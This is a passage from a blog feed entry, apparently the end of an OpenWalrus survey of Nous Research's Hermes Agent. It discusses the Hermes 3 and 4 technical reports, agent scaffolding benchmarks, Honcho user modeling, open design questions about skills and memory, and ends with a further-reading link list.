&lt;p&gt;The &lt;a href="https://arxiv.org/abs/2408.11857" rel="noopener noreferrer"&gt;Hermes 3 technical report&lt;/a&gt; demonstrates that the 405B variant achieves state-of-the-art performance among open-weight models on several benchmarks. The function calling fine-tuning is particularly effective — the earlier Hermes 2 Pro achieved 90% accuracy compared to 60–70% for general-purpose models, a gap that Hermes 3 widened further.&lt;/p&gt;

&lt;p&gt;The &lt;a href="https://arxiv.org/pdf/2508.18255" rel="noopener noreferrer"&gt;Hermes 4 report&lt;/a&gt; introduces the hybrid reasoning approach and validates it empirically: 78.4% reduction in overlong generation on AIME'24 with minimal accuracy cost. The DataForge pipeline's 60B-token synthetic dataset represents a bet that quantity and diversity of synthetic data, filtered by task-specific verifiers, outperforms smaller curated datasets.&lt;/p&gt;

&lt;p&gt;A &lt;a href="https://render.com/blog/ai-coding-agents-benchmark" rel="noopener noreferrer"&gt;Render blog benchmark&lt;/a&gt; provides a striking finding: the same underlying model (Opus 4.5) achieves a 17-problem difference on SWE-bench depending on the agent scaffolding. Architecture matters more than model selection. This validates both Hermes Agent's investment in its ReAct loop + memory system and walrus's focus on runtime architecture — the model is necessary but not sufficient.&lt;/p&gt;

&lt;p&gt;Honcho's user modeling approach (from &lt;a href="https://github.com/plastic-labs/honcho" rel="noopener noreferrer"&gt;Plastic Labs&lt;/a&gt;) represents an underexplored direction. Most agent memory systems focus on what the agent did (episodes, tool calls, outputs). Honcho focuses on who the user is — preferences, work patterns, domain expertise. Whether this produces meaningfully better agent behavior over time, or just accumulates an increasingly stale user profile, is an open empirical question.&lt;/p&gt;

&lt;h2&gt;
  
  
  Open questions
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Does agentskills.io become the POSIX of agent skills?&lt;/strong&gt; Eleven tools adopting the same standard is remarkable, but standardization has a history of fragmenting under pressure. When vendors need features the standard doesn't support (authentication, versioning, dependency management), do they extend agentskills.io or fork it? The SKILL.md format is deliberately minimal — which makes adoption easy but may make evolution hard.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Is Python + Ollama the right stack for local-first?&lt;/strong&gt; Hermes Agent requires a Python runtime, a separate model server process, and configuration. This works for developers already in the Python ecosystem, but it's friction for anyone who isn't. A single binary that includes the inference engine (walrus's approach) removes an entire category of "it works on my machine" problems. The question is whether the flexibility of separate components outweighs the simplicity of a monolith.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Can autonomous skill creation actually compound?&lt;/strong&gt; Hermes Agent's learning loop — complete tasks, create skills, improve skills during use — is the most ambitious memory system we've surveyed. But skills accumulate. Do old skills become stale? Do conflicting skills create confusion? Is there a pruning mechanism, or does the vector store grow unbounded? The agentskills.io standard says nothing about skill lifecycle management.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Does Honcho's user modeling outperform graph memory?&lt;/strong&gt; Hermes models users as entities with derived facts. Walrus models relationships as graph edges with episode nodes. Both are persistent, both evolve. But they make different retrieval tradeoffs: Honcho retrieves user context ("this user prefers TypeScript"), walrus retrieves relational context ("last time this user asked about deployment, the agent used this approach"). Which produces better agent behavior at the 100-session mark?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;DataForge's synthetic data pipeline: quantity vs quality?&lt;/strong&gt; Hermes 3 used 390M tokens of curated data. Hermes 4 uses 60B tokens of DataForge-generated data — a 150x increase. The LLM judge provides quality filtering, but synthetic data can amplify biases present in the seed data. Does 60B tokens of synthetic data actually produce a better agent than 390M tokens of carefully curated data? The Hermes 4 benchmarks suggest yes, but the comparison isn't clean — the base model also changed (Llama 3.1 → ByteDance Seed).&lt;/p&gt;

&lt;h2&gt;
  
  
  Further reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://github.com/NousResearch/hermes-agent" rel="noopener noreferrer"&gt;Hermes Agent — GitHub&lt;/a&gt; — source code and documentation&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://hermes-agent.nousresearch.com/docs/" rel="noopener noreferrer"&gt;Hermes Agent Documentation&lt;/a&gt; — official setup and usage guides&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2408.11857" rel="noopener noreferrer"&gt;Hermes 3 Technical Report (arXiv:2408.11857)&lt;/a&gt; — training methodology and benchmarks&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/pdf/2508.18255" rel="noopener noreferrer"&gt;Hermes 4 Technical Report (arXiv:2508.18255)&lt;/a&gt; — hybrid reasoning and DataForge&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/NousResearch/atropos" rel="noopener noreferrer"&gt;Atropos — GitHub&lt;/a&gt; — distributed RL framework&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/NousResearch/Hermes-Function-Calling" rel="noopener noreferrer"&gt;Hermes Function Calling — GitHub&lt;/a&gt; — function calling dataset and examples&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://agentskills.io/specification" rel="noopener noreferrer"&gt;agentskills.io Specification&lt;/a&gt; — portable skill standard&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/plastic-labs/honcho" rel="noopener noreferrer"&gt;Honcho — GitHub&lt;/a&gt; — entity-centric user modeling&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://render.com/blog/ai-coding-agents-benchmark" rel="noopener noreferrer"&gt;Scaffolding Matters: SWE-bench Agent Benchmark (Render)&lt;/a&gt; — same model, different architecture, different results&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://openwalrus.xyz/blog/hermes-agent-survey" rel="noopener noreferrer"&gt;OpenWalrus&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>research</category>
      <category>opensource</category>
      <category>openwalrus</category>
    </item>
  </channel>
</rss>
